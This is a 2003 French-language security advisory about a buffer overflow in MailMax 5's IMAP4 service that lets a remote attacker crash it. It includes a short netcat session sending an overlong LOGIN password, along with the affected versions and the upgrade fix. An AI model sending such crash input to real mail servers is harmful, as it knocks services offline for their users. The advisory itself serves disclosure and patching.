MailMax Version 5 Buffer Overflow Vulnerability
|
Date de Publication: 2003-04-13
K-Otik ID : 0013
Titre: MailMax Version 5 Buffer Overflow Vulnerability
Exploitable à distance : Oui
Exploitable en local : Non
* Introduction *
MailMax est un serveur email qui supporte les protocoles SMTP, IMAP4, et POP3. Son interface graphique (GUI) TCP/IP permet l'administration du serveur à partir d'internet. Le module Web Admin permet de définir les administrateurs domaines afin de gérer leur comptes. Le problème de type buffer overflow réside dans le protocole IMAP4 (dans le service IMAP4rev1 SmartMax IMAPMax 5) ce qui provoque l'arrêt du service.
* Description Technique - Exploit *
Un attaquant peut provoquer un DoS sur le protocoles IMAP, en envoyant un large mot de passe (grand nombre de caractères), pendant la procédure d'identification.
Cet exploit affichera un message pop-up sur le serveur, indiquant "Buffer overrun detected! - Program: <PATH>\IMAPMax.exe", ce qui provoquera l'arrêt du service, et qui devra être redémarré manuellement.
----------------------------- Exploit ---------------------------
nc 127.0.0.1 143
* OK IMAP4rev1 SmartMax IMAPMax 5 Ready
0000 CAPABILITY
* CAPABILITY IMAP4rev1
0000 OK CAPABILITY completed
0001 LOGIN "" "AAAAAAAAA..[50] ..AAAAAA"
0001 NO Invalid user name or password.
0001 NO Invalid user name or password.
-----------------------------------------------------------------
* Versions Vulnérables *
IMAP4rev1 SmartMax IMAPMax 5 (5.0.10.6 et 5.0.10.7)
* Solution *
Désactiver le service IMAP4rev1 SmartMax IMAPMax 5.
Utiliser IMAPMax.exe version 5.0.10.8, et MailMax Version 5.5
* Crédits *
Vulnérabilité découverte par Dennis Rand et l'équipe de Infowarfare
(Avril 2003).
|